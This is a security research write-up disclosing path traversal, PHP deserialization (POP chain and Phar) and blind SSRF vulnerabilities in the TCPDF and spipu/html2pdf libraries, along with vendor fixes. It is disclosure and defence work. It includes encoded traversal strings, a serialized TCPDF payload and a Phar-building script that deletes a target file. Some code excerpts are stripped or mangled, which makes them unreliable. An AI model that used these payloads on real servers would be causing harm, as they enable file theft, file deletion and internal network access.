Blind trust: what is hidden behind the process of creating your PDF file?

Every day, thousands of web services generate PDF (Portable Document Format) files—bills, contracts, reports. This step is often treated as a technical routine, “just convert the HTML,” but in practice it’s exactly where a trust boundary is crossed. The renderer parses HTML, downloads external resources, processes fonts, SVGs, and images, and sometimes has access to the network and the file system. Risky behavior can occur by default, without explicit options or warnings. That is enough for a PDF converter to become an SSRF proxy, a data leak channel, or even cause denial of service.

We therefore conducted a targeted analysis of popular HTML-to-PDF libraries written in the PHP, JavaScript, and Java languages: TCPDF, html2pdf, jsPDF, mPDF, snappy, dompdf, and OpenPDF. During the research, the PT Swarm team identified **13 vulnerabilities,** demonstrated **7 intentional behaviors**, and highlighted **6 potential misconfigurations.** These included vulnerability classes such as **Files or Directories Accessible to External Parties**, **Deserialization of Untrusted Data**, **Server-Side Request Forgery**, and **Denial of Service**.

PDF generation is increasingly common across e‑commerce, fintech, logistics, and SaaS. Such services are often deployed inside the perimeter, next to sensitive data, where network controls are looser. This means that even a seemingly harmless bug in the renderer can escalate into a serious incident: leakage of documents, secrets, or internal URLs.

In this article, we present a threat model for an HTML-to-PDF library, walk through representative findings for each library, and provide PoC snippets.

## Introduction

### Private user image

To demonstrate a Files or Directories Accessible to External Parties vulnerability, we used a neural network to generate a scan of a passport from a fictitious country. This file simulates sensitive personal data (PII), which security professionals most often encounter during information security audits. For the demonstration, the file will be placed at the following path: `/tmp/user_files/user_1/private_image.png`.

### Arbitrary system file

To demonstrate the Deserialization of Untrusted Data vulnerability, an arbitrary file will be placed on the server at the following path: `/tmp/do_not_delete_this_file.txt`. Deleting such a real file on a live system can cause issues such as denial of service or provide a way to bypass certain restrictions at the server or application level. Note that the process deleting this file must have the necessary permissions.

Checking for the /tmp/do_not_delete_this_file.txt file in the system

“`
user@machine:~$ ls /tmp | grep “do_not_delete_this_file.txt” do_not_delete_this_file.txt user@machine:~$ ls -l /tmp/do_not_delete_this_file.txt -rw-r–r– 1 www-data www-data 36 Aug 4 15:10 /tmp/do_not_delete_this_file.txt user@machine:~$ cat /tmp/do_not_delete_this_file.txt 3d6d1c81-7e5e-4694-b16d-6b06da3aa281
“`

### Identifying the library and its version

PDF generation is most likely performed by a third‑party library, and there are many of them across different programming languages. In many cases these libraries leave their signatures—name and version—in the files they generate.

To identify the signature of the library that generated a PDF file, you can inspect the document properties. The library is TCPDF (version 6.10.1), a popular PHP library.

Identifying the library and its version is essential for information security professionals and bug hunters. Once you have the signature, check for previously discovered and publicly known vulnerabilities, as well as possible misconfigurations and intentional behaviors.

## The tecnickcom/tcpdf library

### Description

The tecnickcom/tcpdf library is a PHP library for generating PDF documents and barcodes and is currently in support only mode. A new version of this library is under development—tecnickcom/tc-lib-pdf.

### Detected vulnerabilities

#### Vulnerability 1. Files or Directories Accessible to External Parties via the image tag and the xlink:href attribute

_Researchers: Vladimir Razov_

##### Description

Special HTML markup supplied by an external source allows an attacker to add an arbitrary image to the generated PDF on the target server due to improper validation of path in the image tag of the `xlink:href` attribute within the embedded SVG image via a picture.

**Background**

Path traversal (also known as Directory traversal) is a web application vulnerability that allows an attacker to access files and directories on the server that should not be accessible through the web interface.

We will demonstrate the exploitation of this vulnerability on version 6.8.0 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

“`
$ composer require tecnickcom/tcpdf:6.8.0
“`

##### Technical details

Let’s look at our first vulnerability, which allowed us to access a private user image on the server.

When parsing an SVG image, which is valid XML file, each child tag is processed by the `startSVGElementHandler` function. Below is a fragment of the `startSVGElementHandler` TCPDF method.

To highlight the key points to observe, we mark them with inline comments using numbered markers: `// marker N`.

_Marker 1_ shows the initialization of the `$img` variable from the associative array `$attribs` via the `xlink:href` key. Tracing the `$img` variable back to _marker 3_ makes it clear that nothing prevents validating the requested image path.

Let’s exploit it!

“`
0) { … } else { // fix image path if (!TCPDF_STATIC::empty_string($this->svgdir) AND (($img[0] == ‘.’) OR (basename($img) == $img))) { // replace relative path with full server path $img = $this->svgdir.’/’.$img; } if (($img[0] == ‘/’) AND !empty($_SERVER[‘DOCUMENT_ROOT’]) AND ($_SERVER[‘DOCUMENT_ROOT’] != ‘/’)) { // marker 2 $findroot = strpos($img, $_SERVER[‘DOCUMENT_ROOT’]); if (($findroot === false) OR ($findroot > 1)) { if (substr($_SERVER[‘DOCUMENT_ROOT’], -1) == ‘/’) { $img = substr($_SERVER[‘DOCUMENT_ROOT’], 0, -1).$img; } else { $img = $_SERVER[‘DOCUMENT_ROOT’].$img; } } } $img = urldecode($img); // marker 3 $testscrtype = @parse_url($img); … } … } break; } … } … } … }
“`

##### Exploitation

An attacker sends a payload that contains two images. In this case, we assume that the externally supplied payload is already in the `$payload` variable.

Each img tag includes a `src` attribute with a Base64‑encoded string.

Web application source code

“`
<?php require __DIR__ . '/vendor/autoload.php'; $payload = <<<payload payload; $pdf = new TCPDF(‘P’, ‘mm’, ‘A4’, true, ‘UTF-8’, false); $pdf->AddPage(); $pdf->writeHTML($payload); $pdf->Output(‘./generated_file.pdf’, ‘I’); ?>
“`

After decoding the Base64-encoded strings, we get a fully valid SVG image that includes the image tag with the `xlink:href` attribute. This attribute contains a relative path to the private image on the target server: `../../../../../../tmp/user_files/user_1/private_image.png` or `/../../../../../../tmp/user_files/user_1/private_image.png` (so that the execution meets the condition marked as _marker 2_).

First SVG payload decoded from Base64

“`

We then call the vulnerable server to trigger PDF generation based on the payload in the `$payload` variable. If successful, the browser displays a PDF file with arbitrary private user images retrieved via path traversal.

##### Fix

The vendor fixed this vulnerability on January 26, 2025, and released the version 6.8.1 of the library. The fix added an extra conditional check in the `startSVGElementHandler` TCPDF method. It checks whether the “../” substring exists in the `$img` variable and, if found, the execution is interrupted with the break statement.

#### Vulnerability 2. Files or Directories Accessible to External Parties via the image tag and the xlink:href attribute

_Researcher: Aleksey Solovev_

##### Description

This vulnerability is directly related to the previous one and the vendor’s patch. The attacker can bypass the vendor’s patch by additionally encoding certain characters in the string.

We will demonstrate the exploitation of this vulnerability on version 6.8.2 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

“`
$ composer require tecnickcom/tcpdf:6.8.2
“`

##### Technical details

In version 6.8.2, the vendor introduced an additional check in the `startSVGElementHandler` TCPDF method for the “../” sequence in the `$img` variable.

Reanalyzing the code in light of new information, we determined that to include an arbitrary private user image again, we must bypass the condition marked as _marker 2_ in the code fragment below.

Library source code (version 6.8.2)

“`
0) { … } else { // fix image path if (strpos($img, ‘../’) !== false) { // marker 2 // accessing parent folders is not allowed break; } if (!TCPDF_STATIC::empty_string($this->svgdir) AND (($img[0] == ‘.’) OR (basename($img) == $img))) { // replace relative path with full server path $img = $this->svgdir.’/’.$img; } if (($img[0] == ‘/’) AND !empty($_SERVER[‘DOCUMENT_ROOT’]) AND ($_SERVER[‘DOCUMENT_ROOT’] != ‘/’)) { // marker 3 $findroot = strpos($img, $_SERVER[‘DOCUMENT_ROOT’]); if (($findroot === false) OR ($findroot > 1)) { if (substr($_SERVER[‘DOCUMENT_ROOT’], -1) == ‘/’) { $img = substr($_SERVER[‘DOCUMENT_ROOT’], 0, -1).$img; } else { $img = $_SERVER[‘DOCUMENT_ROOT’].$img; } } } $img = urldecode($img); // marker 4 $testscrtype = @parse_url($img); … } … } break; } … } … } … }
“`

While I was figuring out how to bypass the `strpos($img, ‘../’) !== false` check that verifies whether the “../” substring (marker 2) exists in the string, I noticed the native function `urldecode`, which decodes the `$img` variable value (marker 4).

The strings `/..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fuser_files%2fuser_1%2fprivate_image.png` or `..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fuser_files%2fuser_1%2fprivate_image.png` successfully bypass the conditional check ( _marker 2_) because they contain the sequence “..%2f” rather than “../”. The strings are then decoded when urldecode is called. When the $img variable string is normalized, all the “..%2f” sequences turn into “../”.

Thus, the additional check introduced by the vendor as a vulnerability patch and marked as _marker 2_ is successfully bypassed.

Web application source code

Let’s consider one of the two Base64‑decoded payloads presented as an SVG image.

First SVG payload decoded from Base64

“`

We call the vulnerable server to trigger PDF generation based on the payload in the `$payload` variable. If successful, the browser displays a PDF file with two arbitrary private user images retrieved via path traversal.

##### Fix

The vendor fixed this vulnerability on April 3, 2025, and released the version 6.9.1 of the library. The fix introduced a new method, `isRelativePath`.

Vendor’s patch in version 6.9.1

“`
class TCPDF { … /** * Check if the path is relative. * @param string $path path to check * @return boolean true if the path is relative * @protected * @since 6.9.1 */ protected function isRelativePath($path) { return (strpos(str_ireplace(‘%2E’, ‘.’, $this->unhtmlentities($path)), ‘..’) !== false); } … }
“`

#### Vulnerability 3. Files or Directories Accessible to External Parties via the image tag and the src attribute

_Researcher: Aleksey Solovev_

##### Description

Here is another vulnerability very similar to the previous one. It involves bypassing a check for the presence of the “../” value in a substring, but in a different place—the `openHTMLTagHandler` method rather than `startSVGElementHandler` as before.

We will demonstrate the exploitation of this vulnerability on version 6.8.2 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

“`
$ composer require tecnickcom/tcpdf:6.8.2
“`

##### Technical details

Based on the detailed description of the previous vulnerability, the parallels are obvious.

When processing the `img` tag in the `openHTMLTagHandler` TCPDF method, it is possible to bypass the check ( _marker 2_). This is done using a string in the `$imgsrc` variable that does not contain the “../” substring and starts with “/” to meet the condition marked as _marker 3_, after which the `$imgsrc` variable is passed to the native `urldecode` function ( _marker 4_) to normalize the relative path.

Library source code (version 6.8.2)

“`
allowLocalFiles && substr($imgsrc, 0, 7) === ‘file://’) { … } else { if (($imgsrc[0] === ‘/’) AND !empty($_SERVER[‘DOCUMENT_ROOT’]) AND ($_SERVER[‘DOCUMENT_ROOT’] != ‘/’)) { // marker 3 // fix image path $findroot = strpos($imgsrc, $_SERVER[‘DOCUMENT_ROOT’]); if (($findroot === false) OR ($findroot > 1)) { if (substr($_SERVER[‘DOCUMENT_ROOT’], -1) == ‘/’) { $imgsrc = substr($_SERVER[‘DOCUMENT_ROOT’], 0, -1).$imgsrc; } else { $imgsrc = $_SERVER[‘DOCUMENT_ROOT’].$imgsrc; } } $imgsrc = urldecode($imgsrc); // marker 4 $testscrtype = @parse_url($imgsrc); … } } } … } … } … }
“`

##### Exploitation

The attacker transfers encoded payload with an image. The encoding ensures that, upon receiving the request, the server does not change the “..%2f” sequence to “../”. Otherwise, we would fail the check ( _marker 2_) and could not exploit the vulnerability.

Web application source code

“`
AddPage(); $pdf->writeHTML($payload); $pdf->Output(‘./generated_file.pdf’, ‘I’); ?>
“`

When sending the request to the server, the attacker encodes the first “/” character (to meet the condition marked as _marker 3_) as “%2f”, and the sequence that should look like “..%2f” (to bypass the check marked as _marker 2_) is double‑encoded as “%252f”.

The scenario looks as follows:

Double encoding of a specific character sequence

“`
/?p=
“`

We then call the vulnerable server to trigger PDF generation based on the payload in the `$payload` variable. If successful, the browser displays a PDF file with two arbitrary private user images retrieved via path traversal.

##### Fix

The vendor fixed this vulnerability on April 3, 2025, and released the version 6.9.1 of the library. The fix introduced a new method, `isRelativePath`.

Vendor’s patch in version 6.9.1

#### Vulnerability 4. Deserialization of Untrusted Data

_Researchers: Aleksey Solovev, Nikita Sveshnikov_

##### Description

While examining the TCPDF class, we found a POP (Property Oriented Programming) chain which, if exploited via unsafe deserialization, would allow an attacker to delete an arbitrary file from the system for which the current process would have permissions.

We will demonstrate the exploitation of this vulnerability on version 6.8.2 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

“`
$ composer require tecnickcom/tcpdf:6.8.2
“`

##### Technical details

We noticed that the TCPDF class contains a magic method `__destruct`, which in turn calls the `_destroy` method. Let’s look more closely at what happens when unsafe deserialization into a TCPDF instance is performed.

**Background**

Deserialization is converting data encoded in a particular format (such as JSON, XML, or a binary format) into instances or data structures that can be used by a program.

Passing a serialized string from an external source to the native `unserialize` function without preprocessing anywhere in the code will result in a TCPDF instance being created. When the instance is no longer needed, it will be destroyed, and the magic `__destruct()` method will be called first.

Inside the destructor, only the `_destroy` method is called ( _marker 1_), so let’s examine this method’s logic.

If the `$this->file_id` field value is absent from the static `$cleaned_ids` variable ( _marker 2_), execution proceeds to the next check ( _marker 3_). In that check, the `$this->imagekeys` field must contain an array of values which, essentially, are paths to files to be deleted. The check verifies whether the file exists in the system ( _marker 5_), after which the native unlink function is called ( _marker 6_), which deletes the transferred value from the `$file` variable.

Sounds easy? It’s time to show how this vulnerability can be exploited.

The __destruct and _destroy magic TCPDF methods

“`
_destroy(true); // marker 1 } … public function _destroy($destroyall=false, $preserve_objcopy=false) { if (isset(self::$cleaned_ids[$this->file_id])) { // marker 2 $destroyall = false; } if ($destroyall AND !$preserve_objcopy && isset($this->file_id)) { // marker 3 … if (isset($this->imagekeys)) { // marker 4 foreach($this->imagekeys as $file) { if (strpos($file, K_PATH_CACHE) === 0 && TCPDF_STATIC::file_exists($file)) { // marker 5 @unlink($file); // marker 6 } } } } … } … }
“`

##### Exploitation

Let’s imagine a web application that generates a PDF file based on data obtained from an external source.

The logic is straightforward: the value passed in the GET parameter “p” must be a serialized string (https://github.com/ambionics/phpggc/pull/215). The system checks that the string exists and deserializes it into the `$payload` variable. Next, the code checks whether the `$payload` array contains a string under the html key. If so, it is used to generate the PDF file.

If everything is correct, we proceed to generate the PDF!

Web application source code

“`
AddPage(); $pdf->writeHTML($payload[‘html’]); $pdf->Output(‘./generated_file.pdf’, ‘I’); ?>
“`

You may have noticed that the TCPDF class is in scope. We create an instance and use it to generate a PDF. As noted earlier, the code calls the native `unserialize` function with data coming from an external source. The pieces fit together.

At the beginning we mentioned that the target server contains the file `/tmp/do_not_delete_this_file.txt`. We will delete it to clearly demonstrate exploitation of the vulnerability we discovered.

Checking for the /tmp/do_not_delete_this_file.txt file in the system:

“`
user@machine:~$ ls -l /tmp/do_not_delete_this_file.txt -rw-r–r– 1 www-data www-data 36 Aug 4 15:10 /tmp/do_not_delete_this_file.txt
“`

On the attacker’s machine, a string was serialized based on the TCPDF class; the fields `file_id` and `imagekeys` must be defined in this string.

The `imagekeys` field contains an array of file paths that will be deleted upon deserialization when the TCPDF magic method `__destruct` executes.

Serializing an instance of the TCPDF class with the preset file_id and imagekeys fields

“`
user@machine:~$ cat generate.php file_id = -1; $dummy->imagekeys = [“/tmp/../tmp/do_not_delete_this_file.txt”]; $payload = serialize([“html” => $dummy]); echo $payload . PHP_EOL; ?> user@machine:~$ php generate.php a:1:{s:4:”html”;O:5:”TCPDF”:2:{s:7:”file_id”;i:-1;s:9:”imagekeys”;a:1:{i:0;s:39:”/tmp/../tmp/do_not_delete_this_file.txt”;}}}
“`

We initiate PDF generation by sending a special HTTP request to the target server in which the GET parameter “p” contains the serialized string.

Attacker scenario execution

“`
/?p=a:1:{s:4:”html”;O:5:”TCPDF”:2:{s:7:”file_id”;i:-1;s:9:”imagekeys”;a:1:{i:0;s:39:”/tmp/../tmp/do_not_delete_this_file.txt”;}}}
“`

During deserialization of the transferred string, a TCPDF instance will be created and then automatically destroyed by calling the destructor, which triggers deletion of an arbitrary file from the system.

When we addressed the web application script, we received a 500 Internal Server Error. Let’s check the target system for the file `/tmp/do_not_delete_this_file.txt`. The file was successfully deleted, which indicates successful exploitation of the vulnerability.

##### Fix

The vendor fixed this vulnerability on April 20, 2025, and released the version 6.9.3 of the library.

The fix introduced a new `_unlink` function, a wrapper over the native `unlink` function, of the TCPDF class ( _marker 2_), as well as an improved check for file existence in the system and for whether the file belongs to the library by adding the substring _tcpdf in the filename ( _marker 1_).

Fixing the file deletion logic during deserialization

“`
class TCPDF { … public function _destroy($destroyall=false, $preserve_objcopy=false) { if (isset(self::$cleaned_ids[$this->file_id])) { $destroyall = false; } if ($destroyall AND !$preserve_objcopy && isset($this->file_id)) { … if (isset($this->imagekeys)) { foreach($this->imagekeys as $file) { if ((strpos($file, K_PATH_CACHE.’__tcpdf_’.$this->file_id.’_’) === 0) && TCPDF_STATIC::file_exists($file)) { // marker 1 $this->_unlink($file); } } } } … } … protected function _unlink($file) // marker 2 { if ((strpos($file, ‘://’) !== false) && ((substr($file, 0, 7) !== ‘file://’) || (!$this->allowLocalFiles))) { // forbidden protocol return false; } return @unlink($file); } … }
“`

#### Vulnerability 5. Server-Side Request Forgery (Blind SSRF) via the img tag and the src attribute

_Researcher: Aleksey Solovev_

##### Description

In this research we touch on Server Side Request Forgery (SSRF) for the first time; we will encounter it again later.

**Background**

SSRF is a web application vulnerability that allows an attacker to send requests from the server to other servers, including internal ones not accessible from the external network. This can lead to serious consequences such as disclosure of confidential information, bypassing network restrictions, and even gaining control of internal systems.

Before we discuss where exactly this vulnerability appears in the library’s source code, its exploitation, and the fix, we remind you of the risks:

– Access to internal resources and their scanning
– Local file read
– Running arbitrary commands
– Attacks on other systems
– Bypassing firewalls and other security tools

In this example we will demonstrate a simple, well known way to send an arbitrary request from the server.

We will demonstrate the exploitation of this vulnerability on version 6.10.0 of the tecnickcom/tcpdf library.

Installing the vulnerable version of the library

“`
$ composer require tecnickcom/tcpdf:6.10.0
“`

##### Technical details

There are quite a few issues in the library’s source code that may lead to server side request forgery. For example, this can happen when processing an image with the `img` tag and the `src` attribute. This occurs because, under various conditions, the library may repeatedly check whether the image actually exists and request the image for further processing.

In this example we will not list the vulnerable code fragments due to their size. However, note that a number of functions can cause a request execution on the server side: `curl_exec`, `getimagesize`, `file_get_contents`, and so on.

##### Exploitation

The attacker transfers a payload that contains an `img` tag with the `src` attribute whose value is the target server’s local address on port 8080. We assume that the payload provided from an external source is already in the `$payload` variable.

Web application source code

Note that an arbitrary web application is running on the target server on port 8080. This demonstrates that the attacker can reach an internal address and port of the server.

Starting the web application on port 8080 on the target server

“`
user@machine:~$ mkdir app && python3 -m http.server 8080 -d ./app Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) …
“`

The attacker accesses the web application script that generates the PDF file. The web application running on the same server on port 8080 receives five loopback requests at the local address 127.0.0.1.

## Fix

We reported the problem to the vendor. However, the library developer replied that this vulnerability is not valid or is out of scope for the library.

## The spipu/html2pdf library

### Description

The spipu/html2pdf library is an HTML to PDF converter written in PHP and compatible with PHP 7.2–8.4. It allows conversion of valid HTML file into PDF to generate invoices, documentation, and so on.

### Detected vulnerabilities

#### Vulnerability 1. Deserialization of Untrusted Data

_Researcher: Aleksey Solovev_

##### Description

We found that the library uses the tecnickcom/TCPDF library internally, which we already discussed above.

In this library we discovered a vulnerability that allows deserialization via a Phar archive followed by deletion of an arbitrary file from the system, provided the current process has the necessary permissions.

**Background**

Phar archives are similar to Java JARs but adapted to the needs and flexibility of PHP applications. A Phar archive is used to distribute a complete PHP application or library as a single file (https://www.php.net/manual/ru/phar.using.intro.php).

To demonstrate the vulnerability, the following is required:

– The PHP version is lower than 8.0. This is because PHP 8.0 improved security: the Phar stream wrapper (phar://) no longer automatically causes deserialization in stream wrapper operations such as `file_exists(‘phar://file.txt’)`.
– The generated Phar archive is already present on the target system at a known path. In real-world web apps, you can often upload it through the file/image upload functionality.
– A POP chain (Property Oriented Programming chain) is in scope.
– A particular native function must be called with a parameter controlled by the attacker, leading to deserialization of the Phar archive.

We will demonstrate the exploitation of this vulnerability on version 5.3.0 of the spipu/html2pdf library.

Installing the vulnerable version of the spipu/html2pdf library

“`
$ composer require spipu/html2pdf:5.3.0
“`

When installing version 5.3.0 of the spipu/html2pdf 5.3.0 library, the Composer package manager installs the then latest version of the tecnickcom/tcpdf library (6.10.0), which already contains the fix for the unsafe deserialization vulnerability we found.

At the time of our research, the vulnerabilities existed in both libraries simultaneously. Therefore, to reproduce the vulnerability, we downgrade tecnickcom/tcpdf to 6.8.2.

Downgrading tecnickcom/tcpdf to 6.8.2

“`
composer update –with tecnickcom/tcpdf:6.8.2
“`

##### Technical details

The spipu/html2pdf library processes a custom tag “cert”. It is handled by the `_tag_open_CERT` Html2Pdf method. Note that the `$param` variable contains values that can be controlled by an attacker.

Let’s examine how the `$certificate` ( _marker 1_) and the `$privkey` ( _marker 3_) variables are initialized and then passed to the native `file_exists` function ( _markers 2 and 4_).

The Html2Pdf _tag_open_CERT method

“`
class Html2Pdf { … protected function _tag_open_CERT($param) { $res = $this->_tag_open_DIV($param); if (!$res) { return $res; } // set certificate file $certificate = $param[‘src’]; // marker 1 if(!file_exists($certificate)) { // marker 2 return true; } // Set private key $privkey = $param[‘privkey’]; // marker 3 if(strlen($privkey)==0 || !file_exists($privkey)) { // marker 4 $privkey = $certificate; } … }
“`

In PHP language, there are certain native functions that can lead to Phar archive deserialization, and `file_exists` is one of them.

Great – now we just need to verify that the POP chain actually exists and that it is in scope for the code.

The spipu/html2pdf library depends on the tecnickcom/tcpdf library. In the latter, we identified the vulnerability and demonstrated how it can be exploited to delete an arbitrary file from the system (described above).

The spipu/html2pdf library dependence on the tecnickcom/tcpdf library

“`
$ tree -L 4 . . ├── composer.json ├── composer.lock ├── index.php └── vendor ├── autoload.php ├── composer │ └── … ├── spipu │ └── html2pdf │ ├── … │ ├── src │ └── … └── tecnickcom └── tcpdf ├── … ├── tcpdf.php └── …
“`

It is now time to exploit the vulnerability we found by using the native `file_exists` function.

##### Exploitation

Before exploitation, let’s confirm that `/tmp/do_not_delete_this_file.txt` exists on the target system.

Checking for the /tmp/do_not_delete_this_file.txt file in the system

“`
user@machine:~$ ls -l /tmp/do_not_delete_this_file.txt -rw-r–r– 1 www-data www-data 36 Aug 4 15:10 /tmp/do_not_delete_this_file.txt
“`

When describing this vulnerability, we mentioned a Phar archive. Attackers generate it on their machine with the POP chain we discovered. When using the spipu/html2pdf library, the TCPDF class of the tecnickcom/tcpdf library is in scope.

On the attacker’s machine, the generate `_phar.php` script was created and run. In it, we define the TCPDF class and create a TCPDF instance with preset values for two required fields— `file_id` and `imagekeys`.

Script for generating a Phar archive in tecnickcom/tcpdf using the POP chain we discovered

“`
file_id = -1; $dummy->imagekeys = [“/tmp/../tmp/do_not_delete_this_file.txt”]; @unlink(“archive.phar”); $archive = new Phar(“archive.phar”); $archive->startBuffering(); $archive->setStub(“setMetadata($dummy); $archive->stopBuffering(); ?>
“`

We generate `archive.phar` using PHP 7.3 and rename it to `archive.png`. It is also important to set `phar.readonly=0` to allow successful generation.

Running the Phar archive generation script

“`
user@machine:~$ php7.3 –define phar.readonly=0 generate_phar.php && mv archive.phar archive.png
“`

The generated archive is placed on the target server. This can happen in various ways, for example via a file or image loading. In this case, we simply placed the Phar archive on the server at `/tmp/user_files/user_1/archive.png`.

Let’s also look at the contents of the generated Phar archive with the xxd binary utility, which creates a hexadecimal representation of the file.

Let’s demonstrate the web application source code.

The `$payload` variable contains payload with a custom tag “cert” with the `src` and `privkey` attributes. The attackers can control the values of these attributes, so they use the `phar://` protocol to address the file `/tmp/user_files/user_1/archive.png` previously uploaded on the server. We assume that the payload provided from an external source is already in the `$payload` variable.

Web application source code

“`
<?php require __DIR__ . '/vendor/autoload.php'; use SpipuHtml2PdfHtml2Pdf; $payload = <<<payload payload; $html2pdf = new Html2Pdf(‘P’, ‘A4’, ‘en’); $html2pdf->writeHTML($payload); echo $html2pdf->output(‘example01.pdf’); ?>
“`

When we access the web application script, processing the payload calls the Html2Pdf `_tag_open_CERT` method, which in turn calls the native function `file_exists` with the value `phar:///tmp/user_files/user_1/archive.png`. This triggers deserialization of the TCPDF class in the archive, followed by its destruction via the `__destruct` magic method. As we recall, this results in the deletion of an arbitrary file from the system, provided that the current process has permissions.

The request returns a successfully generated PDF file.

Let’s check the target system for the file `/tmp/do_not_delete_this_file.txt`. The file was successfully deleted, which indicates successful exploitation of the vulnerability.

##### Fix

The unsafe Phar deserialization was addressed by the vendor on February 26, 2025 in a new library version, 5.3.1.

A new Security class with the `checkValidPath` function was added to the library. The function’s logic matches the protocol requested in the string against a whitelist of allowed protocols, such as file, http, and https. If an external attacker attempts to use a protocol that is not allowed, for example phar, `checkValidPath` throws an `HtmlParsingException`.

Adding the Security class and the checkValidPath method to validate the protocol

“`
class Security implements SecurityInterface { protected $authorizedSchemes = [‘file’, ‘http’, ‘https’]; /** * @param string $path * @return void * @throws HtmlParsingException */ public function checkValidPath(string $path): void { $path = trim(strtolower($path)); $scheme = parse_url($path, PHP_URL_SCHEME); if ($scheme === null) { return; } if (in_array($scheme, $this->authorizedSchemes)) { return; } if (strlen($scheme) === 1 && preg_match(‘/^[a-z]$/i’, $scheme)) { return; } throw new HtmlParsingException(‘Unauthorized path scheme’); } }
“`

#### Vulnerability 2. Server Side Request Forgery (Blind SSRF) via the link tag and href attribute

_Researcher: Aleksey Solovev_

##### Description

Next we demonstrate a series of three server-side request forgery vulnerabilities, each with its own characteristics.

The first vulnerability is triggered by attempting to load CSS (Cascading Style Sheets).

We will demonstrate the exploitation of this vulnerability on version 5.3.0 of the spipu/html2pdf library.

Installing the vulnerable version of the spipu/html2pdf library

“`
$ composer require spipu/html2pdf:5.3.0
“`

##### Technical details

The `extractStyle` CSS function parses HTML markup that may be controlled by attackers. Following the regex-based parsing ( _markers 1_ and _2_), the function extracts the tag attributes ( _marker 3_) and checks them for the expected values ( _marker 4_).

Next, the `$url` variable will be initialized ( _marker 4_) and then used for calling the native function `file_get_contents` (marker 6). This results in a server-side request execution.

Function for extracting cascading style sheets

“`
class Css { … public function extractStyle($html) { // the CSS content $style = ‘ ‘; // extract the link tags, and remove them in the html code preg_match_all(‘/]*)>/isU’, $html, $match); // marker 1 $html = preg_replace(‘/]*>/isU’, ”, $html); $html = preg_replace(‘/</link[^>]*>/isU’, ”, $html); … // analyse each link tag foreach ($match[1] as $code) { // marker 2 $tmp = $this->tagParser->extractTagAttributes($code); // marker 3 // if type text/css => we keep it if (isset($tmp[‘type’]) && strtolower($tmp[‘type’]) === ‘text/css’ && isset($tmp[‘href’])) { // marker 4 // get the href $url = $tmp[‘href’]; // marker 5 // get the content of the css file $this->checkValidPath($url); $content = @file_get_contents($url); // marker 6 … } } … } … }
“`

##### Exploitation

To demonstrate exploitation of this vulnerability, we will show the source code of the web application that includes the “link” tag with the “href” and “type” attributes set to “text/css”. The `href` attribute value is the target server’s local address on port 8080.

Web application source code

“`
<?php require __DIR__ . '/vendor/autoload.php'; use SpipuHtml2PdfHtml2Pdf; $content = '’; $html2pdf = new Html2Pdf(); $html2pdf->writeHTML($content); $html2pdf->output(); ?>
“`

Note that an arbitrary web application is running on the target server on port 8080. This demonstrates that the attacker can reach an internal address and port of the server.

Starting the web application on port 8080 on the target server

“`
user@machine:~$ mkdir app && python3 -m http.server 8080 -d ./app Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) …
“`

The attacker accesses the web application script that generates the PDF file. The web application running on the same server on port 8080 receives a single loopback request with local address 127.0.0.1 when attempting to obtain the cascading style sheets.

##### Fix

A description of the fix will follow shortly.

#### Vulnerability 3. Server Side Request Forgery (Blind SSRF) via the img tag and the src attribute

_Researcher: Aleksey Solovev_

##### Description

Here we examine the classic case—executing a server-side request via an image.

We will demonstrate the exploitation of this vulnerability on version 5.3.0 of the spipu/html2pdf library.

Installing the vulnerable version of the spipu/html2pdf library

“`
$ composer require spipu/html2pdf:5.3.0
“`

#### Technical details

In the Html2Pdf class, there is a `_drawImage` method that takes the variable `$src` as its first argument; this variable is controlled by the attacker.

The `$img` variable can reach two different code paths where the native `getimagesize` function is called ( _marker 1_ and _marker 2_). The `getimagesize` function determines the size of the specified image; for this, it needs to request data from the resource, which can lead to the execution of a server-side request.

The Html2Pdf _drawImage method

“`
class Html2Pdf { … protected function _drawImage($src, $subLi = false) { … if (strpos($src,’data:’) === 0) { $src = base64_decode( preg_replace(‘#^data:image/[^;]+;base64,#’, ”, $src) ); $infos = @getimagesizefromstring($src); $src = “@{$src}”; } else { $this->parsingCss->checkValidPath($src); $infos = @getimagesize($src); // marker 1 } … // if the image does not exist, or can not be loaded if (!is_array($infos) || count($infos)<2) { … // if we have a fallback Image, we use it if ($this->_fallbackImage) { $src = $this->_fallbackImage; $infos = @getimagesize($src); // marker 2 … } } … } … }
“`

##### Exploitation

To demonstrate exploitation of this vulnerability, we will show the source code of the web application that includes the “img” tag with the “src” attribute. The value of the “src” attribute is the target server’s local address on port 8080.

Web application source code

“`
<?php require __DIR__ . '/vendor/autoload.php'; use SpipuHtml2PdfHtml2Pdf; $content = "“; $html2pdf = new Html2Pdf(‘P’, ‘A4’, ‘fr’); $html2pdf->writeHTML($content); echo $html2pdf->output(‘example01.pdf’); ?>
“`

Note that an arbitrary web application is running on the target server on port 8080. This demonstrates that the attacker can reach an internal address and port of the server.

Starting the web application on port 8080 on the target server

“`
user@machine:~$ mkdir app && python3 -m http.server 8080 -d ./app Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) …
“`

The attacker accesses the web application script that generates the PDF file. The web application running on the same server on port 8080 will receive one loopback request at the local address 127.0.0.1 when attempting to obtain the size of the requested image.

When we addressed the script, we received a 500 Internal Server Error. However, we can see that a server-side request was executed.

##### Fix

Please be a little patient. When describing the next vulnerability, we will demonstrate the fix—and what happened after we analyzed the patch proposed by the vendor!

#### Vulnerability 4. Server-Side Request Forgery (Blind SSRF) via the CSS background property and the url function

_Researcher: Aleksey Solovev_

##### Description

The native `getimagesize` function is called again, which will lead to a server-side request execution, but under different circumstances.

Installing the vulnerable version of the spipu/html2pdf library

“`
$ composer require spipu/html2pdf:5.3.0
“`

##### Technical details

When the `Html2Pdf::_drawRectangle` method is called, the `$iName` variable is initialized from `$background[‘image’]` ( _marker 1_). Next, `$iName` will be used when calling the native `getimagesize` function, which can lead to a server-side request execution.

The Html2Pdf _drawRectangle method

“`
